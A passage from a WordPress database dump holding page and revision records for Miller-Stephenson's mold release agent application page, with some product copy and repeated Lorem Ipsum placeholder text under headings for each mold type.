winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="concrete"></a></p>\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="custom"></a></p>\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable of developing a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'publish', 'closed', 'closed', '', 'release-agent-applications', '', '', '2017-06-09 13:01:25', '2017-06-09 13:01:25', '', 0, 'https://www.miller-stephenson.com/?page_id=4321', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (4322, 2, '2017-05-30 14:40:07', '2017-05-30 14:40:07', '<h4 style="text-align: left;"><strong>Advanced Composites Mold Release</strong></h4>\r\n<div>\r\n\r\n<img class="wp-image-4287 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_530979514-340x340.jpg" alt="specialty mold release" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin [product id="" sku=""]professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n</div>\r\n&nbsp;\r\n<h4><strong>Rotational Plastics Mold Release</strong></h4>\r\n<img class="wp-image-4282 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_566838472-340x340.jpg" alt="PTFE release" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<p style="text-align: left;"></p>\r\n\r\n<h4 style="text-align: left;"><strong>Polyurethane Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4289 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609-340x340.jpg" alt="Concrete Release Agent" width="170" height="170" /></p>\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<p style="text-align: left;"></p>\r\n\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style="text-align: left;"></p>', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-30 14:40:07', '2017-05-30 14:40:07', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4323, 2, '2017-05-30 14:40:57', '2017-05-30 14:40:57', '<h4 style="text-align: left;"><strong>Advanced Composites Mold Release</strong></h4>\r\n<div>\r\n\r\n<img class="wp-image-4287 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_530979514-340x340.jpg" alt="specialty mold release" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[product id="" sku=""]\r\n<h4><strong>Rotational Plastics Mold Release</strong></h4>\r\n<img class="wp-image-4282 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_566838472-340x340.jpg" alt="PTFE release" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<p style="text-align: left;"></p>\r\n\r\n<h4 style="text-align: left;"><strong>Polyurethane Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4289 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609-340x340.jpg" alt="Concrete Release Agent" width="170" height="170" /></p>\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<p style="text-align: left;"></p>\r\n\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style="text-align: left;"></p>', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-30 14:40:57', '2017-05-30 14:40:57', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4324, 2, '2017-05-30 14:41:41', '2017-05-30 14:41:41', '<h4 style="text-align: left;"><strong>Advanced Composites Mold Release</strong></h4>\r\n<div>\r\n\r\n<img class="wp-image-4287 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_530979514-340x340.jpg" alt="specialty mold release" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h4><strong>Rotational Plastics Mold Release</strong></h4>\r\n<img class="wp-image-4282 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_566838472-340x340.jpg" alt="PTFE release" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<p style="text-align: left;"></p>\r\n\r\n<h4 style="text-align: left;"><strong>Polyurethane Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4289 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609-340x340.jpg" alt="Concrete Release Agent" width="170" height="170" /></p>\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<p style="text-align: left;"></p>\r\n\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n[product_lookbook cat="category-slug" products="8"]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style="text-align: left;"></p>', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-30 14:41:41', '2017-05-30 14:41:41', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4325, 2, '2017-05-30 14:42:03', '2017-05-30 14:42:03', '<h4 style="text-align: left;"><strong>Advanced Composites Mold Release</strong></h4>\r\n<div>\r\n\r\n<img class="wp-image-4287 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_530979514-340x340.jpg" alt="specialty mold release" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h4><strong>Rotational Plastics Mold Release</strong></h4>\r\n<img class="wp-image-4282 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_566838472-340x340.jpg" alt="PTFE release" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those 